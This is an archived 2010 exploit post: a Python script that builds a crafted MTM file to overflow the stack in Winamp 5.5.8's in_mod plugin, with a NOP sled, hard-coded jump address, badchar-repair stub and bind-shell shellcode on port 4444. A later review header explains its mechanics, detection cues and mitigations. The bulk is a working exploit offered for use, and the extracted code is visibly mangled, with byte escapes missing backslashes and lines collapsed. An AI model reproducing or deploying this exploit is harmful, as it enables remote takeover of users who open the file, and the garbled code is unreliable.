[local exploits] - Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
Posted on 20 October 2010
===================================================
Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
===================================================
#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing out the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and all the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
# Review notes (the published script below is kept byte-for-byte; only this header is added).
#
# What the script does: it concatenates `header + nopsled + eip + patch_shellcode + shellcode`
# into `payload` and writes it to "crash.mtm", i.e. an MTM module file aimed at the in_mod
# plugin named in the file header.  `nopsled` is "x90" * 58207, so the output is dominated by
# a ~58 KB run of a single byte immediately before the 4-byte `eip` value -- a cheap shape to
# flag in file scanning, and exactly what a length check in the module parser should reject.
#
# Reliability assumptions stated by the author: `eip` is a hard-coded "jmp esp" address tied
# to one Spanish Windows XP build ("change at will"), and the file header says there is no
# ASLR or DEP bypass, so either mitigation on the target breaks the technique as written.
# The long `patch_shellcode` section is, per its own comments, a stub that repairs at runtime
# the bytes the plugin filters ("badchars"); the "should be .." / "Ripped" comments after it
# record the original bytes of the payload, which the author's comment labels win32_bind with
# LPORT=4444 -- presumably a listener on TCP 4444 is the post-exploitation indicator.
#
# NOTE(review): in this extracted copy the byte escapes appear as plain `x..` text (no
# backslashes) and the script has been collapsed onto a few physical lines, so the string
# literals shown are not the byte escapes the inline comments describe and each trailing
# `#` comment swallows the rest of its physical line.  Treat it as a historical record of
# the 2010 advisory, not as runnable code.
#
# Code-quality points in the final block: `file` shadows a builtin; the handle is not closed
# if `write` raises; the bare `except:` hides the real cause (e.g. a permission error) behind
# the generic "Cannot create file" message; and the `print` statements make this Python 2 only.
header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E" header += "x04x0C" * 16 nopsled = "x90" * 58207 eip = "xEDx1Ex95x7C" # jmp esp WIN XP SPANISH change at will patch_shellcode = "x90" * 16 patch_shellcode += "x90x33xDB" # Set EBX to zero patch_shellcode += "x54x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION patch_shellcode += "x81xEBx95xFCxFFxFF" # make EBX point to our shell patch_shellcode += "x43"*13 # Move EBX as close as we can to the first badchar patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*1 # Move EBX to the first badchar patch_shellcode += "x80x2Bx20" # Set it to 13 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 05 - verified patch_shellcode += "x43"*16 # Move EBX to the next badchar patch_shellcode += "x80x2BxEC" # Set it to 21 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*30 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 05 - verified patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx42" # Set it to CB - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx78" # Set it to 92 - verified patch_shellcode += "x90"*26 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*18 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 04 - verified patch_shellcode += "x90"*16 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*15 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 02 - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx21" # Set it to EC - 
verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified patch_shellcode += "x90"*14 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*18 # Move EBX to the next badchar patch_shellcode += "x80x2Bx49" # Set it to c1 - verified patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to EA, but we need F6 patch_shellcode += "x80x2BxF4" # Set it to F6 - verified patch_shellcode += "x43"*9 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 11 - verified patch_shellcode += "x43"*10 # Move EBX to the next badchar patch_shellcode += "x90"*3 # Nop sled to avoid damage from CrLf patch_shellcode += "x80x2BxCD" # Set it to 3D - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 07 - verified patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx8E" # Set it to 7F - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxDF" # Set it to 2B - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx1E" # Set it to EC - verified patch_shellcode += "x90"*11 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*12 # Move EBX 
to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 8 - verified patch_shellcode += "x90"*28 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*29 # Move EBX to the next badchar patch_shellcode += "x80x2Bxa7" # Set it to 66 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "x80x2Bxb8" # Set it to 52 - verified patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*17 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 3 - verified patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*12 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*2 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 3 - verified patch_shellcode += "x43"*7 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 2 - verified patch_shellcode += "x90"*10 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*6 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 13 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 5 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx1B" # Set it to F2 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxF4" # Set it to 16 - verified patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 10 - verified patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 10 - verified patch_shellcode += "x90"*20 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*17 
# Move EBX to the next badchar patch_shellcode += "x90"*28 # Lazy nopsled patch_shellcode += "x43"*16 # Move EBX to the next badchar patch_shellcode += "x80x2Bx26" # Set it to E7 - verified patch_shellcode += "x90"*18 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxBE" # Set it to 4C - verified patch_shellcode += "x43"*7 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 5 - verified patch_shellcode += "x90"*(66) # win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub shellcode = "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73" shellcode += "x33" # Should be 13 shellcode += "xa9x41" shellcode += "x25" # should be 05 shellcode += "x3fx83xebxfcxe2xf4x55x2bxeex72x41xb8xfaxc0" shellcode += "x56" # x21x8e Ripped shellcode += "x53x8dx65x8ex7ax95xcax79x3axd1x40xeaxb4" shellcode += "xe6x59x8ex60x89x40xeex76x22x75x8ex3ex47x70xc5xa6" shellcode += "x25" # should be 05 shellcode += "xc5xc5x4bxaex80xcfx32xa8x83xee" # xcbx92 shellcode += "x15x21x17" shellcode += "xdcxa4x8ex60x8dx40xeex59x22x4dx4exb4xf6x5d" shellcode += "x24" #Should be 04 shellcode += "xd4xaax6dx8exb6xc5x65x19x5ex6ax70xdex5bx22" shellcode += "x22" # Should be 02 shellcode += "x35xb4xe9x4dx8ex4fxb5" # xec8e Ripped shellcode += "x7fxa1x1fx6dxb1xe7x4fxe9x6f" shellcode += "x56x97x63x6cxcfx29x36x0d" # xc1 Ripped shellcode += "x36x76x0d" # xf6 ripped shellcode += "x15xfaxef" shellcode += "xc1x8axe8xc3x92" shellcode += "x31" # Should be 11 shellcode += "xfaxe9xf6xc8xe0x59x28xacx0d" # x3d ripped shellcode += "xfcx2b" shellcode += "x27" # should be 07 shellcode += "xc0x79x29xdcx36x5cxecx52xc0x7f" shellcode += "x32" # should be 12 shellcode += "x56x6cxfa" shellcode += "x32" # should be 12 shellcode += "x46x6cxea" shellcode += "x32" # should be 12 shellcode += "xfaxefxcfx29x14x63xcf" shellcode += "x32" #should be 12 shellcode += "x8cxde" shellcode += "x3cx29xa1x25xd9x86x52xC0" # x7fx2b Ripped shellcode += 
"x15x6exfcxbexd5x57" shellcode += "x0d" # xec Ripped shellcode += "x2bxd6xfexbexd3x6cxfcxbexd5x57x4c" shellcode += "x28" # should be 08 shellcode += "x83x76" shellcode += "xfexbexd3x6fxfdx15x50xc0x79xd2x6dxd8xd0x87x7cx68" shellcode += "x56x97x50xc0x79x27x6fx5bxcfx29" # x66x52 Ripped shellcode += "x20xa4x6fx6f" shellcode += "xf0x68xc9xb6x4ex2bx41xb6x4bx70xc5xcc" shellcode += "x23" # shoudl be 03 shellcode += "xbfx47" shellcode += "x32" #Should be 12 shellcode += "x57" shellcode += "x23" # Should be 03 shellcode += "x29xacx24x3bx3dx94" shellcode += "x22" # should be 02 shellcode += "xeax6dx4dx57xf2" shellcode += "x33" # should be 13 shellcode += "xc0xdc" shellcode += "x25" # should be 5 shellcode += "xfaxe9" # xf2x16 Ripped shellcode += "x57x6exf8" shellcode += "x30" #should be 10 shellcode += "x6fx3exf8" shellcode += "x30" # Should be 10 shellcode += "x50x6e" shellcode += "x56x91x6dx92x70x44xcbx6cx56x97x6fxc0x56x76xfaxef" shellcode += "x22x16xf9xbcx6dx25xfaxe9xfbxbexd5" shellcode += "x57xd7x99" #xe7x4c Ripped shellcode += "xfaxbexd3xc0x79x41" shellcode += "x25" # should be 05 shellcode += "x3f" payload = header + nopsled + eip + patch_shellcode + shellcode try: file = open("crash.mtm", "w") file.write(payload) file.close() print "MTM file generated successfuly" except: print "Cannot create file" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-20]</pre></body></html>